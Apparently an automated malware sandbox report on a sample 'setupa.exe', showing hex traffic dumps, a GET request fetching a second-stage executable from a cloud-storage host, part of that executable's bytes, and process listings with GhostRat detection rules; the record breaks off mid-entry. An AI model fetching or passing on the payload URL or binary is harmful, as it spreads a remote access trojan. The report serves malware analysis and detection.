                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: b3 b9 c8 f9 e2 09 58 1e 8b be 6e 05 c2 14 ae ab f2 31 de 82 4a e5 fd 7f d6 94 bf d7 4d 36 bf bf 2b 37 21 20 3f c5 a8 8c 33 d1 23 42 d1 81 9c 56 af e7 76 bd 54 aa 74 7e b7 9f 78 52 d4 f1 a2 0f 99 e2 dc 56 60 9c 9f 0b de 03 c6 11 7b 21 d1 c0 24 0d 26 21 a1 83 f5 b3 20 42 92 48 4f 3a 54 6f c4 1f 85 ca a6 0e b1 f8 0a b0 9b 2c 3d 42 c5 77 d4 8c 45 80 d5 01 ea 7c 50 49 38 eb e5 1d e5 b2 c1 bf 92 d2 3d dc b9 6a 68 50 ee d0 20 6a b2 73 55 ef e4 18 96 07 ef 2e a7 c7 25 a8 dd 61 5a 30 6f b1 79 9e 82 22 68 76 68 d9 fd 36 e2 e7 d4 c7 c8 fb 28 37 ea 6c 3a 30 9f 29 78 cb 15 49 ae e3 c2 f9 79 25 bf 74 7e e0 39 b2 95 12 53 56 69 7f 07 fc 40 41 fd bf 23 94 12 17 58 4e a6 93 da 49 ce f6 25 77 39 81 af 4b e5 f7 04 99 0b b2 18 d4 63 47 55 77 8f f9 97 e6 48 84 96 21 bd f4 84
                                                                                                            Data Ascii: Xn1JM6+7! ?3#BVvTt~xRV`{!$&! BHO:To,=BwE|PI8=jhP jsU.%aZ0oy"hvh6(7l:0)xIy%t~9SVi@A#XNI%w9KcGUwH!
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: 6b 83 cc d3 01 fb 7d 50 21 ce b7 81 2b 67 94 2a 21 d9 9c 5d 43 4e 97 95 6e 26 0f 81 fa 50 56 d8 86 53 b2 b4 2e 3d 30 fb fd 6c 20 77 4a 84 e1 00 eb 30 31 5e b6 be 5d 15 5b 90 a4 cf 04 97 88 29 65 20 d1 36 96 f0 0e 2f 1f ea db b9 bd ea a2 af 57 cb 25 15 5f 54 a0 42 06 de 38 f6 78 0e 66 60 9f 20 d0 89 6e b4 c7 95 8d 92 07 3a 21 3f 47 e5 e7 f1 2a 72 43 44 02 4f 86 b5 0a d3 2b b3 01 ff e7 06 1f c5 74 a7 66 dd 65 c9 9a 87 7e cb 74 8c ce 8a 35 53 49 37 52 13 33 58 3f fe 98 91 7c 1f 15 9b 09 bc 0a 1e 58 58 81 48 55 db 8d ca 26 cd 3d 23 aa 60 4a bd 67 d9 ee 40 35 2b 81 db 97 b0 48 95 f6 12 55 f8 ad 23 56 5c 6f c1 75 6c 2b 3a 02 99 00 39 d2 8a 3d ba 3f 36 65 b3 97 ea 56 dc 68 cd 13 01 d1 f7 85 b0 4c 75 a1 7c 67 56 84 1a 5f 28 0e 0d d8 62 31 03 16 a1 a9 eb 67 4a c9
                                                                                                            Data Ascii: k}P!+g*!]CNn&PVS.=0l wJ01^][)e 6/W%_TB8xf` n:!?G*rCDO+tfe~t5SI7R3X?|XXHU&=#`Jg@5+HU#V\oul+:9=?6eVhLu|gV_(b1gJ
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: 3b 20 09 38 a9 33 35 92 91 58 76 09 ca 80 30 d0 9e 44 52 48 8f 95 83 d8 67 4b 2b 4a 46 cc 4e 67 ae 5e 5d a3 cf 81 e3 39 3f bc e5 22 aa 84 88 43 99 fb 8d 9b 06 23 2f 66 24 1c 4e 06 92 76 c1 63 66 4e f2 19 97 59 c9 20 32 c2 bf c1 80 85 4b cb f1 75 7b ad c8 52 78 7d 0a f3 ef 27 a1 d4 0b 12 25 2b 19 56 aa 9a b2 b9 0c a9 ac 62 60 72 5e 8f 87 d3 ac 1d cc 7a 3f 96 8a 3d ff d1 4c 92 54 17 ad 80 89 65 22 cc 97 6a b3 97 37 2f cc a4 e5 88 7d 28 f9 91 be 09 3a 08 d0 e2 a1 5c de a0 31 b1 c6 0b c2 47 59 25 78 b7 40 31 9d 37 92 15 6b fa c5 61 30 f5 51 aa d7 0e 00 f4 d8 f7 0a 3f ae 06 3c f0 91 3d e3 65 c8 6a f3 ad e8 18 fa 5e 72 8b 26 d3 9c 96 a8 08 c5 fa d1 be c4 12 3d b8 d7 04 ef db 56 40 a0 62 a8 eb e2 d0 7d 36 6d 27 b0 86 ae 6f b9 cb 3c 8f ca 52 90 76 d4 69 cd 03 93
                                                                                                            Data Ascii: ; 835Xv0DRHgK+JFNg^]9?"C#/f$NvcfNY 2Ku{Rx}'%+Vb`r^z?=LTe"j7/}(:\1GY%x@17ka0Q?<=ej^r&=V@b}6m'o<Rvi
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: d1 f4 6d cf 6d 3f 0b c6 52 9e b8 bc 8f 2d 45 f4 bb 90 4d 24 d1 5b 32 15 49 8f 2e 11 2d 36 df 71 e7 cd ac 4d 16 b8 27 15 fa 57 66 e8 27 ba e1 9e 8c 92 3b de 53 e7 1e 4f a4 4d e6 f2 26 67 a5 a5 cd 40 0e d6 74 ca a1 0e 86 61 c6 eb 67 bd 21 9b bd a9 0d e6 48 23 82 06 2f 2d 83 c2 ff b2 d4 90 0a 2d 8c 96 a6 46 af 99 87 5c b3 0e 49 09 f3 9f 5a 3b 55 ee 69 0a 6c 52 09 25 25 73 ce 6f bf 75 93 4b 36 cc 36 9d c5 81 6a a0 98 55 ec 09 e2 81 e9 89 f5 38 f4 6e 55 bb e9 14 19 95 a2 07 30 f8 f8 09 1b ca 9b dc 41 72 34 75 fd 0e a3 2a 98 38 15 82 6a 0b b8 70 01 7e b3 f0 56 c8 5d 8c 3c e9 c7 da 48 77 3e d6 57 d7 9a 69 b8 4e 33 31 a1 20 35 c0 2e 5b 70 d7 2f 49 b6 b6 15 46 b4 0a 70 06 19 50 73 66 b7 d0 72 42 a7 8b e9 5f 0e 14 d3 92 0a eb 51 69 d5 a6 b9 53 11 59 f1 43 7a a8 82
                                                                                                            Data Ascii: mm?R-EM$[2I.-6qM'Wf';SOM&g@tag!H#/--F\IZ;UilR%%souK66jU8nU0Ar4u*8jp~V]<Hw>WiN31 5.[p/IFpPsfrB_QiSYCz
                                                                                                            2024-10-07 04:39:05 UTC7729INData Raw: 91 87 62 8a cd 9c fa c8 47 57 0c 07 62 02 d2 dd 9f 4f 23 ba 5a 71 db d2 f5 77 b7 65 a0 9f 57 27 f1 0a c3 ce ed 51 0c 12 66 c6 aa 6a 4b e4 10 20 0b af c4 3f ef 8a 41 22 2e a7 bc df e3 17 e6 17 d3 64 5b f2 4a 4e 92 26 5a 3c 8c 1b d3 b2 ca 3f 53 84 a1 02 99 cd e0 1d 21 25 10 b2 c5 6d ee 2b be 8d 79 40 b6 6e 71 97 30 9a a2 2f 43 03 3c 56 5a 34 9a a0 38 fd 26 bf ec 99 ce f9 8a bb 8d cd 1b 5d c7 c2 b3 45 ff 5a 5e cc 2c 91 cc cd 62 4a 89 bb c6 60 24 75 fc 59 3f 86 39 b0 42 e2 f5 15 3f 15 ea 94 78 77 23 b6 07 f6 9a e5 51 de ec 7e 4c 45 2c bc 34 31 bc fb f4 01 c2 3c 50 81 f2 51 56 94 70 86 41 af 93 43 65 7d d8 03 90 d0 86 08 aa 03 be f3 7e fb d9 2f dc 59 ea d6 4a 93 89 48 93 4d ce d8 5f 15 14 db dc 2c 97 0d d6 6b 0a d0 b5 ea 1e 75 a8 e0 d0 0c 82 58 ef 55 3d fb 26
                                                                                                            Data Ascii: bGWbO#ZqweW'QfjK ?A".d[JN&Z<?S!%m+y@nq0/C<VZ48&]EZ^,bJ`$uY?9B?xw#Q~LE,41<PQVpACe}~/YJHM_,kuXU=&


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.54970647.79.64.1574434768C:\Users\user\Desktop\setupa.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-10-07 04:39:07 UTC138OUTGET /upupoo-classicshell.exe HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: SecureWinHTTP/1.0
                                                                                                            Host: kehu8.oss-cn-hongkong.aliyuncs.com
                                                                                                            2024-10-07 04:39:07 UTC562INHTTP/1.1 200 OK
                                                                                                            Server: AliyunOSS
                                                                                                            Date: Mon, 07 Oct 2024 04:39:07 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 198920
                                                                                                            Connection: close
                                                                                                            x-oss-request-id: 670365EB9EB6B23232729FA9
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: "606CDA46E88CE86AE85AC92B2B560D0A"
                                                                                                            Last-Modified: Mon, 23 Sep 2024 14:23:44 GMT
                                                                                                            x-oss-object-type: Normal
                                                                                                            x-oss-hash-crc64ecma: 12797003162322076001
                                                                                                            x-oss-storage-class: Standard
                                                                                                            x-oss-ec: 0048-00000113
                                                                                                            Content-Disposition: attachment
                                                                                                            x-oss-force-download: true
                                                                                                            Content-MD5: YGzaRuiM6GroWskrK1YNCg==
                                                                                                            x-oss-server-time: 37
                                                                                                            2024-10-07 04:39:07 UTC15822INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad b7 f6 fe e9 d6 98 ad e9 d6 98 ad e9 d6 98 ad e0 ae 0d ad fd d6 98 ad e0 ae 1b ad 67 d6 98 ad e0 ae 0b ad fa d6 98 ad e9 d6 99 ad 3c d6 98 ad e0 ae 1c ad aa d6 98 ad f7 84 0c ad e8 d6 98 ad e0 ae 09 ad e8 d6 98 ad 52 69 63 68 e9 d6 98 ad 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 60 9c 18 62 00 00 00 00 00 00 00 00 e0 00 02
                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g<RichPEL`b
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: ff ff 8d 4e 20 5e e9 f3 fe ff ff 8b ff 56 8b f1 8d 4e 14 e8 5d fe ff ff 33 c0 89 46 2c 89 46 30 89 46 34 8b c6 5e c3 8b ff 56 8b f1 8d 46 14 50 ff 15 84 31 41 00 8d 4e 2c 5e e9 bf fe ff ff 8b ff 56 8b f1 e8 c2 ff ff ff b8 00 00 40 00 8d 4e 14 c7 06 38 00 00 00 89 46 08 89 46 04 c7 46 0c 00 09 00 00 c7 46 10 ec 3f 41 00 e8 1b fe ff ff 85 c0 7d 07 c6 05 a8 9e 41 00 01 8b c6 5e c3 80 79 08 00 c7 01 fc 3f 41 00 74 0e 8b 49 04 85 c9 74 07 51 ff 15 88 31 41 00 c3 8b ff 55 8b ec ff 75 08 6a 00 ff 71 04 ff 15 6c 31 41 00 5d c2 04 00 8b ff 55 8b ec 83 7d 08 00 74 0e ff 75 08 6a 00 ff 71 04 ff 15 64 31 41 00 5d c2 04 00 8b ff 55 8b ec 33 c0 39 45 08 75 09 ff 75 0c 8b 01 ff 10 eb 21 39 45 0c 75 0c ff 75 08 8b 01 ff 50 04 33 c0 eb 10 ff 75 0c ff 75 08 50 ff 71 04 ff
                                                                                                            Data Ascii: N ^VN]3F,F0F4^VFP1AN,^V@N8FFFF?A}A^y?AtItQ1AUujql1A]U}tujqd1A]U39Euu!9EuuP3uuPq
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 61 ec ff ff 8b b8 94 00 00 00 e8 56 ec ff ff ff 75 08 33 f6 89 b0 94 00 00 00 e8 19 f9 ff ff 59 84 c0 75 4f 33 db 39 1f 7e 1d 8b 47 04 8b 4c 03 04 68 24 93 41 00 e8 13 c6 ff ff 84 c0 75 0d 46 83 c3 10 3b 37 7c e3 e8 09 03 00 00 6a 01 ff 75 08 e8 64 f8 ff ff 59 59 68 ac 41 41 00 8d 4d d4 e8 37 f6 ff ff 68 a4 65 41 00 8d 45 d4 50 e8 5e c5 ff ff 8b 75 08 bf 63 73 6d e0 39 3e 0f 85 88 01 00 00 83 7e 10 03 0f 85 7e 01 00 00 8b 46 14 3b c3 74 12 3d 21 05 93 19 74 0b 3d 22 05 93 19 0f 85 65 01 00 00 8b 7d 18 83 7f 0c 00 0f 86 bf 00 00 00 8d 45 e4 50 8d 45 f0 50 ff 75 f8 ff 75 20 57 e8 ac c8 ff ff 83 c4 14 8b f8 8b 45 f0 3b 45 e4 0f 83 97 00 00 00 8b 45 f8 39 07 0f 8f 81 00 00 00 3b 47 04 7f 7c 8b 47 10 89 45 f4 8b 47 0c 89 45 e8 85 c0 7e 6c 8b 46 1c 8b 40 0c 8d
                                                                                                            Data Ascii: aVu3YuO39~GLh$AuF;7|judYYhAAM7heAEP^ucsm9>~~F;t=!t="e}EPEPuu WE;EE9;G|GEGE~lF@
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 06 89 46 08 89 46 04 5e 5d c3 8b ff 55 8b ec 53 56 8b 75 08 8b 46 0c 8b c8 80 e1 03 33 db 80 f9 02 75 40 a9 08 01 00 00 74 39 8b 46 08 57 8b 3e 2b f8 85 ff 7e 2c 57 50 56 e8 69 ff ff ff 59 50 e8 8f 19 00 00 83 c4 0c 3b c7 75 0f 8b 46 0c 84 c0 79 0f 83 e0 fd 89 46 0c eb 07 83 4e 0c 20 83 cb ff 5f 8b 46 08 83 66 04 00 89 06 5e 8b c3 5b 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 35 00 00 00 59 eb 2f 56 e8 7c ff ff ff 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 00 ff ff ff 50 e8 80 33 00 00 59 f7 d8 59 1b c0 eb 02 33 c0 5e 5d c3 6a 14 68 c0 66 41 00 e8 f0 9b ff ff 33 ff 89 7d e4 89 7d dc 6a 01 e8 15 c5 ff ff 59 89 7d fc 33 f6 89 75 e0 3b 35 e0 bb 41 00 0f 8d 83 00 00 00 a1 c4 ab 41 00 8d 04 b0 39 38 74 5e 8b 00 f6 40 0c 83 74 56 50
                                                                                                            Data Ascii: FF^]USVuF3u@t9FW>+~,WPViYP;uFyFN _Ff^[]UVuuV5Y/V|YtF@tVP3YY3^]jhfA3}}jY}3u;5AA98t^@tVP
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0 00 4a 83 e9 04 85 d2 7d e7 33 c0 5e 6a 1f 59 2b 0d 30 9b 41 00 d3 e3 8b 4d ec f7 d9 1b c9 81 e1 00 00 00 80 0b d9 8b 0d 34 9b 41 00 0b 5d e0 83 f9 40 75 0d 8b 4d 0c 8b 55 e4 89 59 04 89 11 eb 0a 83 f9 20 75 05 8b 4d 0c 89 19 5f 5b c9 c3 8b ff 55 8b ec 83 ec 2c 8b 45 08 0f b7 48 0a 53 8b d9 81 e1 00 80 00 00 89 4d ec 8b 48 06 89 4d e0 8b 48 02 0f b7 00 81 e3 ff 7f 00 00 81 eb ff 3f 00 00 c1 e0 10 57 89 4d e4 89 45 e8 81 fb 01 c0 ff ff 75 27 33 db 33 c0 39 5c 85 e0 75 0d 40 83 f8 03 7c f4 33 c0 e9 a5 04 00 00 33 c0 8d 7d e0 ab ab 6a 02 ab 58 e9 95 04 00 00 83 65 08 00 56 8d 75 e0 8d 7d d4 a5 a5 a5 8b 35 44 9b 41 00 4e 8d 4e 01 8b c1 99 83 e2 1f 03 c2 c1 f8 05 8b d1 81 e2 1f 00 00 80 89
                                                                                                            Data Ascii: MZ+;|1tdJ}3^jY+0AM4A]@uMUY uM_[U,EHSMHMH?WMEu'339\u@|33}jXeVu}5DANN
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 10 00 10 00 10 00 10 00 14 00 14 00 10 00 10 00 10 00 10 00 10 00 14 00 10 00 10 00 10 00 10 00 10 00 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 01 00 00 00 00 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4
                                                                                                            Data Ascii:
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 9d 40 00 00 00 00 00 02 00 00 00 10 47 41 00 08 00 00 00 e4 46 41 00 09 00 00 00 b8 46 41 00 0a 00 00 00 20 46 41 00 10 00 00 00 f4 45 41 00 11 00 00 00 c4 45 41 00 12 00 00 00 a0 45 41 00 13 00 00 00 74 45 41 00 18 00 00 00 3c 45 41 00 19 00 00 00 14
                                                                                                            Data Ascii: e@GAFAFA FAEAEAEAtEA<EA
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: d1 47 4b 63 61 64 58 0c 11 00 fc fe 27 3b 73 53 9e 4b 43 c3 cb 88 1d 65 a0 18 21 00 b4 fe de d9 4c 2a c4 ea 46 1e 0d af 03 e5 c0 c3 a6 32 5a ed f9 6a c0 18 20 00 1c f8 6b ea 12 dd d5 82 2b eb b0 35 34 bc 00 94 0f 63 66 e0 b8 85 ec b2 39 14 de 83 c7 09 00 7e 7f bb 2a 44 0f b4 73 26 f5 07 9f 0d 2d a1 50 8d 41 3a 07 4a 31 88 ea 9e cf 92 1d 86 f8 7b 3c 13 7a c2 a1 1d 08 cb 04 dd 61 68 52 02 51 45 53 d4 52 23 67 60 1d b0 46 58 13 a8 29 63 b0 07 26 3d 5d b8 72 8d 92 64 f7 a8 5b 6b 04 45 aa 7f cc 66 34 7f a7 97 e7 44 7a 9c 00 6a 5e 45 f4 68 47 4e b5 cb d8 d7 cd 87 4d 03 5f 0d 2a b2 9b 0e 4b 25 e1 dd c7 89 8e 9f 93 62 22 99 d9 36 16 16 12 cd 20 01 12 48 f6 6f b2 12 05 89 2a 15 23 aa 56 8a a8 86 78 e6 4a c5 c5 c6 cb 17 7d 05 e1 44 05 14 93 51 63 bf ed 88 58 23 f1
                                                                                                            Data Ascii: GKcadX';sSKCe!L*F2Zj k+54cf9~*Ds&-PA:J1{<zahRQESR#g`FX)c&=]rd[kEf4Dzj^EhGNM_*K%b"6 Ho*#VxJ}DQcX#
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 43 ff fe da bb ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe e5 d0 ff ff 9d 4a ff ff 98 41 ff fe d2 ad ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe e9 d7 ff ff a6 5b ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff fe 96 3e df fe 97 3e e0 ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 9b 47 ff fe d6 b4 ff fe fd fc ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe f1 e5 ff ff a5 59 ff ff
                                                                                                            Data Ascii: CJA[????????>>???????GY
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 45 ff ff 98 41 ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff fe 97 3f de fe 96 3e df ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 98 40 ff ff b4 76 ff ff 9b 46 ff ff b8 7d ff fe fb f8 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff ff cb 9f ff ff 98 41 ff fe d4 b0 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe dc bf ff ff 99 43 ff ff c3 90 ff fe fd fd ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fc fb ff ff c1 8c ff ff 99 43 ff ff ae 69 ff ff 98 41 ff ff 97 3f ff ff 97 3f ff ff 97 3f ff fe 97 3f de fe 96 3e df ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 99 43 ff fe d1 ab ff ff a9 60 ff ff a2 54 ff fe ed de ff fe
                                                                                                            Data Ascii: EA?????>???@vF}ACCiA????>???C`T


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:00:39:00
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Users\user\Desktop\setupa.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\setupa.exe"
                                                                                                            Imagebase:0x7ff689640000
                                                                                                            File size:1'695'232 bytes
                                                                                                            MD5 hash:60CAFF11E037BAC89BDB4DD789D65FD7
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:00:39:00
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\lsass.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\lsass.exe
                                                                                                            Imagebase:0x7ff654c90000
                                                                                                            File size:59'456 bytes
                                                                                                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:00:39:00
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\dllhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                            Imagebase:0x7ff669820000
                                                                                                            File size:21'312 bytes
                                                                                                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:00:39:07
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files\upupoo-classicshell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files\upupoo-classicshell.exe"
                                                                                                            Imagebase:0xc20000
                                                                                                            File size:198'920 bytes
                                                                                                            MD5 hash:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:00:39:08
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:svchost.exe
                                                                                                            Imagebase:0x420000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292327565.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246797998.000000000286D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043504278.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043302904.0000000002870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246719024.000000000286D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3348722522.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292327565.0000000002870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246842041.0000000004552000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3354222266.0000000006733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292521835.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2235102743.0000000004452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292583935.0000000004512000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246842041.0000000004584000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043573393.0000000004512000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:00:39:09
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
